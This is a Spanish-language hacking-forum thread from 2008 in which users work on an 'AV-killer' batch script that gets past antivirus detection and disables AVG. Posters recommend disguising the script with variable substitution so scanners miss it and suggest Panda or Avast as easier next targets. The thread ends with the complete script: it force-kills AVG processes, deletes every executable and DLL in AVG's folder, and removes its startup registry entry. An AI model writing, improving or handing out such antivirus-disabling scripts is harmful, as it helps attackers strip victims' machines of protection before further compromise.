Que no detecten mi av-killer hecho en batch...

Iniciado por Carloswaldo, 10 Mayo 2008, 21:51 PM

0 Miembros y 2 Visitantes están viendo este tema.

Sai-To


Carloswaldo

Cita de: brache en 11 Mayo 2008, 22:15 PM
trata de cifrar! ;) set va = blablabla...

Wiiiiiiiiiiiiiiiiiiiiiiiiii ;D ;D ;D ;D ;D ;D ;D ;D ;D

Avg matado, a por el proximo av ::)

Carloswaldo

Por cierto, algo raro me pasa, aún matando el avg me da acceso denegado cuando quiero editar el .bat que tenía el código pobre. Esto no pasaba antes de instalar el avg, ¿será que un servicio sigue activo? ¿cómo averiguarlo?

MK-Ultra

Cita de: Carloswaldo en 12 Mayo 2008, 03:00 AM
Por cierto, algo raro me pasa, aún matando el avg me da acceso denegado cuando quiero editar el .bat que tenía el código pobre. Esto no pasaba antes de instalar el avg, ¿será que un servicio sigue activo? ¿cómo averiguarlo?

Mirando en el administrador de Tareas  :rolleyes:

Cita de: Carloswaldo
OBVIO, pero como se yo cuales son.

Cita de: Freeze.
Mirando los ejecutables que tienes en la ruta de la carpeta del AVG, OBVIO

:rolleyes:
Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

Carloswaldo

Si ya no hay ningún ejecutable porque se borraron todos. :xD

Carloswaldo

Me he tomado el trabajo de buscar todos y cada uno de los procesos que tenía activos. Unos eran del sistema, otros del vmware, etc, pero nada de nada con respecto al avg... le perdí el rastro :(

Freeze.

Estuve un buen tiempo - ahora que recuerdo - tratando de matar al AVG desde  VB y no pude porque no podia desactivar servicios o algo asi :P

Así que podrias comenzar con otro AV más facil o menos dificil ;) Como el panda o el avast ;)

MK-Ultra

el avast no es malo ^^

te recomiendo el panda antes que el avast  ;)
Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

Carloswaldo

Pero... pero.... debe haber una forma... Y alguien debe de saberla ¿verdad?...

No me rendiré ahora que he llegado "tan" lejos... :xD :xD

Carloswaldo :(

Carloswaldo

He estado investigando.

Este archivo no lo puedo eliminar ni a bala, osea ni forzandolo en el cmd ni nada:

avgse.dll

Esto es lo que encontre en internet:

CitarDescription: avgse.dll is located in a subfolder of "C:\Program Files" - normally C:\Program Files\Grisoft\AVG Free\. Known file sizes on Windows XP are 40960 bytes (47% of all occurrence), 50688 bytes, 29743 bytes, 45056 bytes, 28207 bytes.
A .dll file (Dynamic Link Library) is a special type of Windows program containing functions that other programs can call. This .dll file can be injected to all running processes and can change or manipulate their behavior. The program is not visible. The service has no detailed description. It can change the behavior of other programs or manipulate other programs. File avgse.dll is not a Windows system file. avgse.dll seems to be a compressed file. Therefore the technical security rating is 64% dangerous, however also read the users reviews.

Quiere decir que esta dll puede estar camuflada en otro proceso? como saberlo?

Ahí está mi codigo:

@echo off
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
exit